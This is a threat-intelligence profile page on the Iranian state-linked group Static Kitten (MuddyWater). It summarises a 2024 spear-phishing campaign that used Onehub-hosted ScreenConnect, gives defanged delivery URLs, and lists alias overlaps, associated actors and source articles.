Static Kitten

Threat Actor Profile Updated 7 days ago
Download STIX
Preview STIX
Static Kitten, also known as MuddyWater, Mercury, Mango Sandstorm, and TA450, is an Iranian government-sponsored hacking group suspected to be linked to the Iranian Ministry of Intelligence and Security. The group has been active since 2017 and is notorious for its cyber-espionage activities. Static Kitten uses various tactics, such as spear-phishing campaigns, to infiltrate systems and steal sensitive information. In recent events, Static Kitten has targeted Israeli entities with a new spear-phishing campaign, distributing N-able's Advanced Monitoring Agent remote administration tool. In March 2024, Static Kitten launched a phishing campaign where they distributed two URLs via phishing emails, directing recipients to Onehub, a legitimate file storage service that Static Kitten is known to use for malicious purposes. These URLs led to ZIP files themed to be relevant to government agency employees. Anomali Threat Research confirmed that Static Kitten continues to use Onehub to host a file containing ScreenConnect, which is likely used to steal sensitive information or download malware for additional cyber operations. The delivery URLs found in this campaign were "ws.onehub[.]com/files/7w1372el" and "ws.onehub[.]com/files/94otjyvd". The phishing emails contained files with names translated as "Analysis and study of the normalization of relations between the Arab countries and Israel", "Scholarships", and "Project". The objective was to direct users to a downloader URL via a phishing email that impersonates an EXE file. Static Kitten's activities represent both a continuation and evolution of tactics used by similar groups such as APT34, also known as Cobalt Gypsy, OilRig, and Helix Kitten.
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
MuddyWater
4
MuddyWater is an advanced persistent threat (APT) group, also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros. This threat actor has been linked to the Iranian Ministry of Intelligence and Security (MOIS) according to a joint advisory from cybersecurity firms. The group empl
Ta450
2
TA450, an Advanced Persistent Threat (APT) group, is a threat actor linked to Iran that has been identified as being behind a series of cyber-attacks. APTs are typically associated with nation-states or state-sponsored groups and are known for their persistence and ability to remain undetected over
POWERSTATS
1
PowerStats is a malicious software (malware) created by the MuddyWater cyberespionage group, which is linked to Iran. This malware, written in PowerShell, was designed to exploit and damage computer systems, often infiltrating them without the user's knowledge through suspicious downloads, emails, o
TEMP.Zagros
1
TEMP.Zagros, also known as MuddyWater, Earth Vetala, MERCURY, Static Kitten, and Seedworm, is an Iran-nexus threat actor that has been active since at least May 2017. This group is associated with the Iranian Ministry of Intelligence and Security (MOIS) and has historically targeted regions and sect
APT34
1
APT34, also known as OilRig, EUROPIUM, Hazel Sandstorm, and Crambus among other names, is a threat actor believed to be operating on behalf of the Iranian government. Operational since at least 2014, APT34 has been involved in long-term cyber espionage operations primarily focused on reconnaissance
Helix Kitten
1
Helix Kitten, also known as APT34, OilRig, Cobalt Gypsy, Hazel Sandstorm, and Crambus, is a threat actor believed to originate from Iran. The group has been tracked by various cybersecurity firms including FireEye, Symantec, and CrowdStrike, each using different names to identify the same entity. Th
Mango Sandstorm
1
Mango Sandstorm, also known as MuddyWater or Mercury, is a threat actor group linked to Iran's Ministry of Intelligence and Security (MOIS) by the Israeli government. The group has been identified as being involved in several cyber-attacks, utilizing various tactics to gain initial access to targete
MERCURY
1
Mercury, also known as MuddyWater and Static Kitten, is a threat actor group linked to global espionage activities, with suspected ties to the Iranian Ministry of Intelligence and Security. This group has been noted for its malicious activities, compromising multiple victims that another group, POLO
Seedworm
1
Seedworm, also known as MuddyWater, TEMP.Zagros, Static Kitten, and several other monikers, is a threat actor believed to be linked with Iran's Ministry of Intelligence and Security (MOIS). This cyberespionage group has been active since 2017, targeting various sectors globally, including government
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Phishing
Apt
Malware
Microsoft
Government
Downloader
Iran
Espionage
Rmm
iranian
Microsoft’s
Screenconnect
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
QuicksandUnspecified
1
Quicksand is a type of malware designed to exploit and damage computer systems. It infiltrates devices through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt operations, or even hold data hostage for ransom. This mali
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
Stardust ChollimaUnspecified
1
Stardust Chollima is a recognized threat actor in the cybersecurity industry, primarily known for its malicious activities aimed at acquiring funds. This group has been linked to various high-profile cyber-attacks and fraudulent activities since 2015. Stardust Chollima has been associated with the f
CrambusUnspecified
1
The Iranian Crambus espionage group, also known as OilRig, APT34, and other aliases, is a threat actor with extensive expertise in long-term cyber-espionage campaigns. In the most recent attack between February and September 2023, this group infiltrated an unnamed Middle Eastern government's network
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Source Document References
Information about the Static Kitten Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
BankInfoSecurity
7 days ago
Iranian State Hackers Are Deploying a New Malware Backdoor
Securityaffairs
4 months ago
Iran-Linked APT TA450 embeds malicious links in PDF attachments
BankInfoSecurity
4 months ago
Iranian TA450 Group Tries Out New Tactics on Israelis
CERT-EU
9 months ago
Cyberattack hits Ace Hardware
CERT-EU
9 months ago
MuddyWater has been spotted targeting two Israeli entities
Securityaffairs
9 months ago
MuddyWater has been spotted targeting two Israeli entities
CERT-EU
9 months ago
Iran’s MuddyWater Group Targets Israelis with Fake Memo Spear-Phishing
CERT-EU
9 months ago
Iran's MuddyWater Group Targets Israelis with Fake Memo Spear-Phishing
CERT-EU
9 months ago
Iran's MuddyWater Targets Israel in New Spear-Phishing Cyber Campaign
CERT-EU
9 months ago
Iranian Hackers Lurked for 8 Months in Government Network
CERT-EU
a year ago
Why is it so rare to hear about Western cyber-attacks?
MITRE
a year ago
Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies
CERT-EU
a year ago
Microsoft: Iranian APTs Exploiting Recent PaperCut Vulnerability